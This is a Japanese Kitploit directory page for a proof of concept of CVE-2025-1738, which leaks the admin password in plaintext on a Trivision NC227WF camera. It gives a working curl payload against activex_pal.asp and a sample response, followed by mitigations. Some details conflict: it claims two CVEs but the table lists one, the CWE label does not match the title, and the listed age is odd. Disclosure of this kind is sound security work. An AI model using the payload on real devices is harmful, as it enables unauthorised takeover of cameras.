Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1738 — 0day発見 CVE-2025-1738 | Kitploit
ツール/GitHubGitHub/n0n4m3x41/cve-2025-1738
IoTセキュリティパスワード攻撃脆弱性分析エクスプロイトハードウェアとIoTセキュリティ学習と教育
GitHubn0n4m3x41/cve-2025-1738

CVE-2025-1738

0day発見 CVE-2025-1738

リポジトリを見る
35ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-1738 - Trivision Camera NC227WF PoC

📋 概要

責任ある開示に従い、公式のCVEが2件割り当てられました。

CVECVSS v3.1スコアCWEタイプ
CVE-2025-1738AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N6.2CWE-598平文パスワードの露出

🔍 CVE-2025-1738 — 平文パスワードの露出 (CWE-598)

説明

認証を必要とせず、ローカルの任意のユーザーが管理者パスワードを平文で取得できます。

  • 攻撃ベクトル: ローカル (AV:L)
  • CVSSスコア: 6.2
  • CWE: CWE-598 (機密のクエリ文字列を伴うGETリクエストメソッドの使用)

ペイロード

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp

応答例

画像
root@kitploit:~
...password=unguessable123!...

管理者パスワードは、レスポンス本文内で平文のまま返されます。


🛡️ 緩和策

  • ファームウェアをアップグレード:Trivision からパッチ済みバージョンが提供されている場合。
  • カメラを専用VLANに隔離し、外部からのアクセスを遮断する。
  • ファイアウォールを使用して、カメラの管理ポートを信頼できないネットワークセグメントから保護する。
  • デフォルトの認証情報を変更し、パスワードを定期的にローテーションする。
  • activex_pal.asp および mblogin.asp への不審なアクセスを監視する。

📚 参照

  • NVD — CVE-2025-1738
  • NVD — CVE-2025-1739

⚖️ 免責事項

このリポジトリは、教育および正規のセキュリティ研究のみを目的としています。著者はいかなる誤用についても責任を負いません。デバイスをテストする前に、必ず明示的な許可を取得してください。

ツールをダウンロード